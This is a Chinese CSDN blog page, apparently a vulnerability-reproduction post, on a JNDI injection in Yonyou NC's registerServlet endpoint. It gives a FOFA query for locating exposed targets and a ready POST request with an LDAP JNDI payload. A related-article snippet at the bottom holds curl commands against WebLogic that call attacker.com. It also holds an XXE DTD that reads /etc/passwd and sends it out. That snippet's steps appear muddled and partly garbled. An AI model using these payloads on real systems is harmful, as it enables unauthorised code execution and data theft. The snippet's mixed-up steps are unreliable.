【漏洞复现】用友 NC portal-registerServlet JNDI注入漏洞

最新推荐文章于 2024-06-06 11:55:05 发布

从不学安全

最新推荐文章于 2024-06-06 11:55:05 发布

阅读量209

点赞数 5

分类专栏：漏洞复现文章标签：安全网络 sql

本文链接：https://blog.csdn.net/qq_67810151/article/details/138950089

版权

漏洞复现专栏收录该内容

60 篇文章 16 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01 产品简介

用友NC是用友网络科技股份有限公司开发的一款大型企业数字化平台。它主要用于企业的财务核算、成本管理、资金管理、固定资产管理、应收应付管理等方面的工作，致力于帮助企业建立科学的财务管理体系，提高财务核算的准确性和效率。

0x02 漏洞概述

用友NC存在JNDI注入漏洞，未授权的攻击者可以通过该漏洞构造特定的请求，利用JNDI功能加载恶意类并执行远程代码。

0x03 测绘语句

fofa: app="用友-UFIDA-NC"

0x04 漏洞复现

POST /portal/registerServlet HTTP/1.1

Host:

Content-Type: application/x-www-form-urlencoded



type=1&dsname=ldap://{
  {dnslog}}

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

从不学安全

关注关注

5
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
【漏洞复现】用友 NC portal-registerServlet JNDI注入漏洞

用友NC存在JNDI注入漏洞，未授权的攻击者可以通过该漏洞构造特定的请求，利用JNDI功能加载恶意类并执行远程代码。
复制链接

扫一扫

专栏目录

订阅专栏

用友NC registerServlet JNDI 远程代码执行漏洞复现(XVE-2024-10248)

0xSec

05-11

840

用友NC registerServlet 接口处存在JNDI 远程代码执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。

【漏洞复现】用友NC registerServlet JNDI 远程代码执行漏洞(XVE-2024-10248)

siu~

05-28

497

用友NC registerServlet 接口处存在JND! 远程代码执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。

参与评论您还未登录，请先登录后发表或查看评论

HTTP/1.0和HTTP/1.1的区别，HTTP怎么处理长连接

05-08

863

1.HTTP简介　　web浏览器和服务器之类的交互过程必须遵守的协议.他是tcp/ip中的一个应用协议。用来协议数据交换过程和数据本身的格式.主要的有HTTP/1.0和HTTP1.1. 　　HTTP/1.0和HTTP/1.1都把TCP作为底层的传输协议。　　HTTP客户首先发起建立与服务器TCP连接。一旦建立连接，浏览器进程和服务器进程就可以通过各自的套接字来访问TCP...

用友NC65产品portal新增按钮和NC portal获取按钮控件,控制其显示与隐藏

u010741112的博客

10-26

762

用友NC65产品portal新增按钮以及NC portal获取按钮控件,控制其显示与隐藏。1、在表单配置里面导出修改后导入进去（导出的是个zip文件，放到编辑器里面编辑就好）获取按钮控件,控制其显示与隐藏。2、直接修改最初的模板。

漏洞复现-用友UFIDA-YongYou系列

aming小老弟

10-03

1483

UFIDA是中国的一家知名企业软件公司，全称为用友软件股份有限公司（Yonyou Software Co . , Ltd . ）。该公司成立于 1988 年，总部位于北京，是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案，包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业，如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程，并提供数据分析和决策支持工具。

用友NC-Portal流程中心查询

u010741112的博客

10-26

351

用友NC-Portal流程中心查询主要涉及类： WfmTaskQryTmpImpl.java MainViewController.java TaskQryParam.java

2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享！

weixin_72543266的博客

04-22

1056

也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.

JNDI-Injection-Exploit:JNDI注入测试工具（生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞，例如Jackson，Fastjson等）

05-07

JNDI注入漏洞描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器，LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。使用...

DirtyCow提权漏洞复现（CVE-2016-5195）1

08-08

DirtyCow提权漏洞复现（CVE-2016-5195）复现(By Jean)目录 1. 环境部署 2 2. 漏洞复现 2 3. 参考 3环境部署主机操作系统

05-08

Jackson官方github仓库发布安全issue，涉及漏洞CVE-2019-14361和CVE-2019-14439，均是针对CVE-2019-12384漏洞的绕过利用方式，当用户提交一个精心构造的恶意JSON数据到WEB服务器端时，可导致远程任意代码执行。...

CVE-2020-14645:Weblogic CVE-2020-14645 UniversalExtractor JNDI注入getDatabaseMetaData（）

03-08

CVE-2020-14645 Weblogic CVE-2020-14645 UniversalExtractor JNDI注入getDatabaseMetaData（）项目取决于演示版要求JDK版本<JDK6u211 / 7u201 / 8u191 Weblogic版本12.2.1.4.0 不要非法使用！！！！！参考谢谢...

读书笔记-《软件定义安全》之一：SDN和NFV：下一代网络的变革

wuxiaobing1234的博客

06-06

661

SDNSDN的体系结构可以分为3层：基础设施层与控制层之间通过控南向接口进行交互，控制层与应用层之间通过北向接口进行交互。NFVNFV分为3部分：NFV与SDN之间的关系NFV与SDN的目标都是尽可能使用通用硬件来实现网络功能，前者可使网络功能开发者只关注于虚拟网络资源的管理，而不需要关心底层硬件规格和其他细节；同样后者可让网络运维开发者只关注上层的网络业务特性和控制，而不需要关注底层网络组网技术和数据包转发逻辑上。① 基础设施层，包括交换机处理流程的设计与实现、转发规则对交换机流表的高效利用，以及交换机流

水电站大坝安全监测工作详解

yousino1的博客

06-05

168

监测人员需要定期对大坝的物理结构进行检查，包括但不限于大坝表面的裂缝、渗漏水位、混凝土和金属结构的状况。此外，现场监测还需要评估大坝周边的环境和水文情况，如水位、流速和沉积物等。这不仅包括物理数据的录入，也包括对数据的初步分析，如趋势分析、异常识别等。建立和维护一个包括人员管理、财务管理和技术管理在内的综合监测管理系统，可以保证监测工作的顺利进行。通过上述9项工作的细致执行，可以有效地监控和保障水电站大坝的安全运行。资料的归档不仅需要物理存储，也应采用数字化存储，确保信息的长期保存和易于检索。

《互联网政务应用安全管理规定》电子邮件安全如何整改？

yuzijiang11111的博客

06-03

320

由统一身份认证平台/ IAM 系统充当 HR 系统或 OA 系统与邮箱之间的“桥梁”，实时将账号从 HR/OA 系统内自动同步到邮箱及其他下游应用系统里，流程如下图所示。机关事业单位除了需要应对钓鱼邮件、账号被盗等问题，还需要考虑到国产化改造场景中的国产邮箱身份认证、其他场景（应用、网络、终端）的统一身份认证等问题。以 Exchange 邮箱为例，它通过微软 AD 域控下发的证书进行加密，用户设备上必须有对应算法的证书予以解密才能正常查看邮件，这一机制有效地保障了电子邮件传输和存储的安全。

安全漏洞扫描工具

weixin_45639224的博客

06-05

287

安全漏洞扫描工具

一文了解如何安全有效的进行PB级别的大数据迁移

最新发布

镭速的博客

06-06

637

在PB级数据转移这场战斗中，镭速凭借其速度、安全、灵活性和智能化管理等优势，成为了众多企业和组织信赖的选择。它不仅解决了数据转移中的许多问题，还为许多行业提供了一个性价比极高的选择。

weblogic jndi注入漏洞利用

12-11

WebLogic 的/console/consolejndi.portal接口可以调用存在 JNDI 注入漏洞的com.bea.console.handles.JndiBindingHandle类，从而造成 RCE。攻击者可以通过构造恶意请求，将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上，从而实现远程代码执行。具体步骤如下： 1. 构造恶意请求，将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上。例如，可以使用以下命令将一个恶意的 LDAP URL 绑定到 WebLogic JNDI 树上： ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "ldap://attacker.com:1389/Exploit", "targets": [{"identity": {"type": "Server", "name": "AdminServer"}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 2. 构造恶意请求，触发 JNDI 注入漏洞。例如，可以使用以下命令触发漏洞： ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "Exploit", "bindings": [{"name": "Exploit", "type": "javax.naming.Reference", "value": {"className": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryClassName": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryMethodName": "setConfigLocation", "factoryMethodArgs": ["http://attacker.com/evil.xml"]}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 3. 在攻击者控制的服务器上，启动一个 HTTP 服务器，将恶意的 XML 文件放到该服务器上。例如，可以使用以下命令启动一个 Python HTTP 服务器： ``` python -m SimpleHTTPServer 80 ``` 4. 构造恶意的 XML 文件，该文件将在 WebLogic 服务器上执行恶意代码。例如，可以使用以下 XML 文件： ``` <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> ``` 5. 在攻击者控制的服务器上，启动一个 HTTP 服务器，将恶意的 DTD 文件放到该服务器上。例如，可以使用以下命令启动一个 Python HTTP 服务器： ``` python -m SimpleHTTPServer 80 ``` 6. 构造恶意的 DTD 文件，该文件将在 WebLogic 服务器上执行恶意代码。例如，可以使用以下 DTD 文件： ``` <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % remote "<!ENTITY % send SYSTEM 'http://attacker.com/?%payload;'>"> %remote; ``` 7. 等待 WebLogic 服务器向攻击者控制的服务器发送 HTTP 请求，从而触发恶意代码的执行。

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交